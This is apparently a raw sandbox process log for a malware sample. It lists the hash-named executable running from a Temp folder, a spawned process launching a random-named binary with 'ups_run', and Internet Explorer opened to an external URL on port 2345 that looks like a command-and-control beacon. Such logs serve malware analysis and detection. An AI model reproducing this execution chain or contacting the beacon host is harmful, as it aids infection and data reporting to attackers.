416003bd517e6224a1e4bbc50ce35216d2c0d05454b8ac5e72f8f3983141b548.exe "C:\Users\Administrator\AppData\Local\Temp\416003bd517e6224a1e4bbc50ce35216d2c0d05454b8ac5e72f8f3983141b548.exe"
732CreateProcess.exe C:\temp\CreateProcess.exe C:\Temp\uomgeywroj.exe ups_run
2800iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home
2624